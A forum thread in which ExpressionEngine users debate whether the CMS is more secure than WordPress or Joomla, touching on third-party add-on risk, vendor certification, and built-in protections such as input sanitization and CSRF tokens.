Thread

I was thinking of telling a potential client about EE’s better security in comparison to a Joomla and Wordpress based site they were being quoted on but then I realised I wouldn’t have much laymens examples of how to explain this.

Anyone got any marketable or easily explainable points on how EE is more secure?

When a “hacker” finds an exploit, that information typically ends up being posted to security boards which track such things.  When the developer of the exploited code learns of an exploit the flaw is hopefully patched and a warning posted on the developers web site.  This is the information that you would use to build a case of ExpressionEngine being more secure than Wordpress.

For example, do a search at this site for both Wordpress and ExpressionEngine.  Wordpress has developed a nice list but ExpressionEngine only has one entry from 2006.  Do the same for Joomla and Drupal.

What this list probably does not show is all the vulnerabilities of the add-ons that are typically used to build a site.  Third party add-ons have no Q and A process for security and performance.  Ellislab has setup a process for certification but I am not sure how popular that process has been. 

This actually brings up a very good point.  Ellislab is accountable for anything they ship out the door.  Due to their record, they have built a good deal of trust with their user base.  If Ellislab were to do things that would result in a crash of their “trust stock” then the company could take a huge hit to their bottom line.

3rd party developers don’t necessarily have this same level of trust or accountability.  What does Joe Blow hobbyist developer care if he were to release an add-on which opens a back door to your application?  If he is not getting paid then he may not even care enough about the add-on to patch it when a flaw is revealed.

To go shopping for any add-on that might give your site cool functionality is a bit silly considering the risks.  Of course, some sites have more risk than others and the risks vary.  Problems could range anywhere from damage to a brand by unknowingly advertising Viagra to compromising sensitive data.

So really, you have to ask this question not only of Wordpress and ExpressionEngine, but with every add-on to the site.  Stick with trusted developers.

Add on to that the developers here are fantastic and a lot of the time do actually take a look at 3rd party add-ons even if they aren’t going the certified route and will lend a hand and tips to ensure that things stay that way. I think that is also tantamount to how fantastic a system EE really is. They have built such a fantastic code base that even for programming newbies like me we can get stuck into creating plugins and extensions that (hopefully mine) don’t cause any problems.

Because the system is so well built and documented like an Encyclopaedia Britannica this makes it easier for developers to create items that won’t crash the system or cause any back door entry for any pesky blighters.

So let’s see a good show of hands supporting the EE dev crew as they have done a fantastic job on this front.

Best wishes,

Mark

Add on to that the developers here are fantastic and a lot of the time do actually take a look at 3rd party add-ons even if they aren’t going the certified route and will lend a hand and tips to ensure that things stay that way. I think that is also tantamount to how fantastic a system EE really is. They have built such a fantastic code base that even for programming newbies like me we can get stuck into creating plugins and extensions that (hopefully mine) don’t cause any problems.

Because the system is so well built and documented like an Encyclopaedia Britannica this makes it easier for developers to create items that won’t crash the system or cause any back door entry for any pesky blighters.

So let’s see a good show of hands supporting the EE dev crew as they have done a fantastic job on this front.

Best wishes,

Mark

I disagree and I think this is false confidence.  ExpressionEngine cannot save people from making mistakes.  You have all the power to build something that will kill a server and open ExpressionEngine to attacks.  Good documentation and helpful libraries do not make good programmers. 

There is nothing in ExpressionEngine that makes it more safe from these problems (insecure or badly coded community add-ons) than any other system can.  ExpressionEngine does have a helpful developer library to pull from and some good docs but there is nothing there that is not available to any other X developer working on X system.

All of the information is available for you to be a master web developer but that does not mean you are going to absorb that information and master it.  “Newbies” are exactly the types of developers you have to watch out for when you are shopping for add-ons for your business applications.  That is not to say a novice “hobbyist” cannot write solid code, but unless that person has built a high level of trust then developers should be highly suspect of anything from such developers they put into their clients applications.

Maybe Ellislab does give hints and help, but that is not a policy that my client can rely on.  Certification goes a long way in solving this problem.

I know what you are saying John but I was more referring to the fact that EE has so many great in built methods that people can use and so don’t go and hack together their own PHP code to do the same thing that this makes it slightly safer.

Of course developers even great ones can still make mistakes. I’m sure the (exceptionally simple 😊 ) plugins that I have made are not absolutely top-notch but then none of them (hopefully) could be used to bring down an EE installation but what I was trying to say was that a lot of the CMS systems I have used in the past have had next to no level of developer access such as this and it has literally been hacks to the core files all the way which is just a joke.

In this respect ExpressionEngine is fantastic.

Didn’t want to give the wrong impression that’s all. I totally go along with everything you say there.

Best wishes,

Mark

Well, security by obscurity is no security at all, right?

Most of EE’s security comes from how it handles requests and the personal support people who encourage secure behavior. Security is a mindset and has much more to do with behavior than with a system configuration.

The key is to build-in security measures that are inherent, such as washing all POST and GET requests through a sanitizer, and then encourage all comers to utilize that inherent security.

If it’s bypassed, though, you’re right back where you started, which is the support policy comes in. Do not encourage insecure behavior, which re-inforces the system’s ability to manage the security itself.

Security is a reputational risk for a company like EE. They’ve built their business around professional clients with specific needs, but engineered a brilliant system for making it simple and effective to hook into that security (which is what Mark was getting at).

The only security measure I haven’t seen emphasized by EE is putting the system folder below the root folder, where it could never be accessed directly by external means.

Of course, htaccess can provide non-local security measures (such as not allowing looking into directories), but I would imagine EE takes the point of view that the decision to do so would be in the developers hands, who would know the necessity.

BTW, this is not related, but talking about security as a mindset, if you have never heard of or read Bruce Schneier’s Crypto-Gram newsletter, I highly recommend it:

http://www.schneier.com/crypto-gram.html

I disagree and I think this is false confidence.  ExpressionEngine cannot save people from making mistakes.  You have all the power to build something that will kill a server and open ExpressionEngine to attacks.  Good documentation and helpful libraries do not make good programmers.

While your statement is mostly true, ExpressionEngine does do a number of things behind that scenes that protect from the most common PHP security exploits.  URL sanitization, disabling of registered globals, some basic protections for input, CSRF prevention via the Secure Forms feature, which is enabled by default.  Sanitized file uploads, enabled by default.  All of that without you having to use any of the libraries or tools built in for additional safety and security, such as the database insert and update methods that automatically prep and escape your data, XSS sanitization, and so on.

Derek you said what I was trying to say! Been having a problem with words all day 😊

Sorry for that John. Must install a dictionary and thesaurus in this small head of mine 😉

Best wishes,

Mark

Well with all this talk about security, what just happened to the ExpressionEngine site? Was down for around 10 minutes just then.

Nothing bad I hope?

Best wishes,

Mark

What this list probably does not show is all the vulnerabilities of the add-ons that are typically used to build a site.  Third party add-ons have no Q and A process for security and performance.  Ellislab has setup a process for certification but I am not sure how popular that process has been.

I’m curious about this. As far as I know there’s only been one certified third party module released hasn’t there? I know I personally haven’t really considered certifying the little things I’ve released because the number of people actually using them is so small, as is my spare time 😉

It probably would be a good experience however, as I’m sure it would turn up quite a few things I should be doing, or things that I am doing incorrectly…